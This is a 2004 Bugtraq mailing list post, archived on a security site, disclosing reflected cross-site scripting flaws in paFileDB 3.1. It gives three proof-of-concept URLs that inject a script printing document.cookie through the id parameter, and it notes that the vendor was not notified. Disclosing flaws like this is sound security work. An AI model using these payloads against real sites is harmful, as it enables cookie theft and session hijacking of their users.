Bugtraq: New XSS vulnerabilities in paFileDB 3.1 final

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

New XSS vulnerabilities in paFileDB 3.1 final

From: alireza hassani <trueend5 () yahoo com>
Date: Sat, 25 Sep 2004 06:58:46 -0700 (PDT)

Another XSS Vulnerability has been found in paFileDB!

paFileDB is designed to allow webmasters have a
database of files for download on their site.


Vulnerable:

Software: email & category & file paFileDB modules

Just Tested on: paFileDB 3.1 Final , but likely works
on another versions.


Exploit:

http://site/downloads/pafiledb.php?action=email&id=1?%22><script>alert(document.cookie)</script>

http://site/downloads/pafiledb.php?action=category&id=1?%22><script>alert(document.cookie)</script>

http://site/downloads/pafiledb.php?action=file&id=1?%22><script>alert(document.cookie)</script>


-------------------------------------------------------------------------------

Script authors  not contacted for some reason
therefore There is no solution at this time.

-------------------------------------------------------------------------------
Discovered by trueend5 (trueend5 () yahoo com)

Additional information @ http://www.persianhacker.net




                
_______________________________
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com

By Date By Thread

Current thread:

New XSS vulnerabilities in paFileDB 3.1 final alireza hassani (Sep 25)